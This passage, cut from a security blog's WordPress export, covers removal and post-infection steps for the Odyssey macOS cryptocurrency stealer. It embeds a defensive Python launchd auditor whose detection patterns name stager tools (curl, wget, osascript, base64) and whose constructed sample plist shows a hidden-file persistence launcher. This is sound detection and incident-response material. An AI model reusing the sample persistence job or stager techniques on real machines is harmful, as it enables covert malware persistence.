\/Library\/LaunchDaemons\/com.love.russia.plist\r\n        # -f matches the whole command line, so check the ps output above first so nothing unrelated is killed\r\n        sudo pkill -f &quot;\\.init&quot;\r\n        sudo pkill -f &quot;lovemrtrump&quot;\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Remove Persistence Mechanisms:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        sudo rm -f \/Library\/LaunchDaemons\/com.love.russia.plist\r\n        rm -f ~\/.init ~\/.start ~\/.username ~\/.pwd\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Clean Temporary Files:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        sudo rm -rf \/tmp\/lovemrtrump\/\r\n        sudo rm -f \/tmp\/out.zip\r\n        sudo rm -f \/tmp\/ledger.zip\r\n        sudo rm -f \/tmp\/starter\r\n        <\/pre>\r\n    <\/li>\r\n    \r\n    <li><strong>Verify 
Application Integrity:<\/strong>\r\n        <pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n        # A genuine Ledger Live build carries a valid Developer ID signature; a swapped-in copy fails verification or shows a different team\r\n        codesign --verify --deep --strict --verbose=2 &quot;\/Applications\/Ledger Live.app&quot;\r\n        codesign -dv --verbose=4 &quot;\/Applications\/Ledger Live.app&quot; 2&gt;&amp;1 | grep -E &quot;^(Authority|TeamIdentifier)&quot;\r\n        spctl --assess --type execute -v &quot;\/Applications\/Ledger Live.app&quot;\r\n        # Compare the TeamIdentifier with a fresh download from ledger.com; if it differs or verification fails, delete the app and reinstall from the official source\r\n        <\/pre>\r\n    <\/li>\r\n<\/ol>\r\n\r\n\r\n<h2>Post-Infection Security Measures<\/h2>\r\n\r\n<p>After removing the malware, implement these critical security steps:<\/p>\r\n\r\n<h3>Immediate Actions<\/h3>\r\n<ul>\r\n    <li><strong>Change All Passwords:<\/strong> Update passwords for all accounts, especially financial and cryptocurrency services. Do this from a clean device, and change the macOS account password first, since the phished one unlocks the stolen keychain<\/li>\r\n    <li><strong>Review Financial Accounts:<\/strong> Check bank statements, credit reports, and cryptocurrency wallet balances<\/li>\r\n    <li><strong>Enable 2FA:<\/strong> Activate two-factor authentication on all sensitive accounts<\/li>\r\n    <li><strong>Monitor Credit Reports:<\/strong> Set up fraud alerts with credit bureaus<\/li>\r\n<\/ul>\r\n\r\n<h3>Browser Security<\/h3>\r\n<ul>\r\n    <li><strong>Clear Browser Data:<\/strong> Remove all saved passwords, cookies, and form data. Stolen session cookies stay valid until the sessions are revoked on the server side, so also sign out of all sessions on each service<\/li>\r\n    <li><strong>Reinstall Extensions:<\/strong> Remove and reinstall all browser extensions, especially wallet-related ones<\/li>\r\n    <li><strong>Update Browsers:<\/strong> Ensure all browsers are running the latest versions<\/li>\r\n    <li><strong>Review Permissions:<\/strong> Audit browser extension permissions and remove unnecessary access<\/li>\r\n<\/ul>\r\n\r\n<h3>Cryptocurrency Security<\/h3>\r\n<ul>\r\n    <li><strong>Create New Wallets:<\/strong> Generate new wallets from a fresh seed and transfer funds out of potentially compromised wallets; a new address derived from the old seed is still controlled by whoever holds that seed<\/li>\r\n    <li><strong>Hardware Wallet Reset:<\/strong> If there is any chance the recovery phrase was typed into the trojaned app, treat that seed as burned: reset the device, set it up with a newly generated phrase and move funds to it. Resetting and restoring the same phrase changes nothing<\/li>\r\n    <li><strong>Verify Applications:<\/strong> Reinstall all cryptocurrency applications from official sources<\/li>\r\n    <li><strong>Monitor Transactions:<\/strong> 
Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity<\/li>\r\n<\/ul>\r\n\r\n<h2>The Broader Threat Landscape<\/h2>\r\n\r\n<p>The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. It exploits no software vulnerability at all: the victim is talked into running the loader, which means Gatekeeper, notarization and download quarantine never get a say, and the stealer itself is assembled from the system&#8217;s own scripting and administration tools rather than from a bespoke binary that a scanner might already know.<\/p>\r\n\r\n<p>This attack shares characteristics with other recent campaigns targeting Mac users, including <a href=\"https:\/\/gridinsoft.com\/blogs\/rustbucket-malware-attacks-macos\/\">RustBucket malware<\/a> and various <a href=\"https:\/\/gridinsoft.com\/blogs\/trojan-win64-rustystealer-dks-mtb-removal\/\">cross-platform stealers<\/a>. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users&#8217; trust in system dialogs and terminal commands.<\/p>\r\n\r\n<p>The campaign&#8217;s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, where transfers are irreversible and there is no chargeback or fraud department to appeal to.<\/p>\r\n\r\n<h3>Geopolitical Implications: The Russia Connection<\/h3>\r\n\r\n<p>The malware&#8217;s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as <code>com.love.russia.plist<\/code> in the system&#8217;s LaunchDaemons directory, while staging stolen data in a folder named <code>lovemrtrump<\/code>. 
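<p>Because that persistence artifact is an ordinary launchd job, the same audit can be run over any Mac&#8217;s <code>\/Library\/LaunchDaemons<\/code> and <code>~\/Library\/LaunchAgents<\/code>, catching both the known label and any other job that looks like dropped persistence (a program under <code>\/tmp<\/code> or a hidden file in a home folder, a <code>bash -c<\/code> wrapper that fetches or detaches something, RunAtLoad combined with KeepAlive). The Python script below is an added example for this article, not code from the original analysis: the malicious sample plist is constructed to match the artifacts named in this write-up (label <code>com.love.russia<\/code>, payload at <code>~\/.init<\/code>), and its exact program arguments, the user name <code>alice<\/code> and the benign <code>com.example.updater<\/code> job are hypothetical.<\/p>

```python
"""Audit launchd property lists for dropped persistence of the kind Odyssey Stealer installs.

Added example, not code from the original write-up. Point it at /Library/LaunchDaemons or
~/Library/LaunchAgents; the sample plists at the bottom are constructed for the demo.
"""
import plistlib
import re
from pathlib import Path

# Label reported for this campaign; extend from your own threat-intel feed.
KNOWN_BAD_LABELS = {"com.love.russia"}
# Programs launched from temp space or from a hidden file in a home folder.
SUSPICIOUS_PATH_RE = re.compile(
    r"(^|\s)(/tmp/|/private/tmp/|/var/tmp/|/Users/[^/\s]+/\.|~/\.|/Users/Shared/)")
# A shell -c wrapper whose command line fetches, decodes or detaches something at load time.
SHELL_WRAPPER_RE = re.compile(r"\b(bash|sh|zsh)\b\s+-c\b")
STAGER_TOOL_RE = re.compile(r"\b(curl|wget|osascript|base64|nohup)\b")


def audit_plist(data: bytes) -> list[str]:
    """Return the reasons a launchd job looks like dropped persistence (empty list = clean)."""
    try:
        job = plistlib.loads(data)
    except Exception as exc:  # malformed or non-plist content still deserves a look
        return [f"unparseable plist: {exc}"]
    reasons = []
    label = str(job.get("Label", ""))
    if label in KNOWN_BAD_LABELS:
        reasons.append(f"known-bad label {label}")
    # launchd runs either Program or ProgramArguments[0]; join both into one command line.
    parts = ([str(job["Program"])] if job.get("Program") else []) + [
        str(a) for a in job.get("ProgramArguments") or []]
    cmdline = " ".join(parts)
    if SUSPICIOUS_PATH_RE.search(cmdline):
        reasons.append("program lives in temp space or a hidden home-folder file")
    if SHELL_WRAPPER_RE.search(cmdline) and STAGER_TOOL_RE.search(cmdline):
        reasons.append("shell -c wrapper that fetches, decodes or detaches at load")
    if job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: restarts whenever it is killed")
    return reasons


def audit_directory(directory: Path) -> dict[str, list[str]]:
    """Map each *.plist file name in a launchd directory to its audit findings."""
    return {p.name: audit_plist(p.read_bytes()) for p in sorted(directory.glob("*.plist"))}


# Constructed samples (hypothetical contents; the real file is not reproduced here).
MALICIOUS_PLIST = plistlib.dumps({
    "Label": "com.love.russia",
    "ProgramArguments": ["/bin/bash", "-c", "nohup /Users/alice/.init >/dev/null 2>&1 &"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Library/Application Support/Example/updater", "--check"],
    "StartInterval": 3600,
})

if __name__ == "__main__":
    for name, blob in (("constructed malicious", MALICIOUS_PLIST), ("constructed benign", BENIGN_PLIST)):
        print(name, "->", audit_plist(blob) or ["clean"])
    # Live audit of this Mac, if run on one (directories are simply skipped elsewhere).
    for d in (Path("/Library/LaunchDaemons"), Path("~/Library/LaunchAgents").expanduser()):
        if d.is_dir():
            for fname, findings in audit_directory(d).items():
                if findings:
                    print(d / fname, "->", findings)
```

<p>Run as root to read <code>\/Library\/LaunchDaemons<\/code> in full. A hit on the path or wrapper heuristics is not proof on its own (some vendor updaters are ugly), but a job that trips several of them, and was created around the time the victim ran the &#8220;verification&#8221; command, is what to pull for analysis before removing it.<\/p>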
These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users. They are also the weakest kind of attribution evidence: a label and a directory name cost nothing to plant, and the other artifacts in this analysis (a single server at odyssey1[.]to, commodity stealer tradecraft) do not independently point to any particular group.<\/p>\r\n\r\n<p>Cryptocurrency theft paired with provocative naming is consistent with politically motivated operators, but equally with a financially motivated crew that enjoys baiting analysts. What the Ledger Live replacement does show is a practical understanding of how retail users interact with hardware wallets through their companion software.<\/p>\r\n\r\n<h2>Conclusion<\/h2>\r\n\r\n<p>The Odyssey Stealer&#8217;s distinctive characteristics &#8211; from its Russian-themed persistence mechanisms (<code>com.love.russia.plist<\/code>, <code>lovemrtrump<\/code> directories) to its specific targeting of hardware wallet applications like Ledger Live &#8211; suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety: the device keeps the keys safe, but the software that talks to it can still ask for the recovery phrase or alter what gets signed.<\/p>\r\n\r\n<p>Mac users must remain vigilant against these evolving threats. No website verification ever requires opening Terminal, and no legitimate application ever asks for a hardware wallet&#8217;s recovery phrase. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.<\/p>\r\n\r\n<p>As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. 
Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests. A recovery phrase is typed into exactly one place, the hardware device itself, and never into software on the Mac.<\/p>\r\n\r\n<p>The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas, whatever their actual affiliation turns out to be.<\/p>","protected":false},"excerpt":{"rendered":"<p>A new macOS malware campaign is targeting users through social engineering, masquerading as legitimate Cloudflare security verification. The Odyssey Stealer represents a significant escalation in Mac-targeted cybercrime, combining deceptive web pages with AppleScript-based data theft capabilities. 
Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories [&hellip;]<\/p>\n","protected":false},"author":16,"featured_media":31104,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17,15],"tags":[192,28,93,1360],"class_list":{"0":"post-31095","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"category-security-news","9":"tag-macos","10":"tag-malware","11":"tag-russian-hackers","12":"tag-stealer"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/06\/Odyssey-Stealer.jpg","author_info":{"display_name":"Dmytro Grydin","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/grydin\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=31095"}],"version-history":[{"count":10,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095\/revisions"}],"predecessor-version":[{"id":31129,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31095\/revisions\/31129"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/31104"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=31095"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft
.com\/blogs\/wp-json\/wp\/v2\/categories?post=31095"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=31095"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}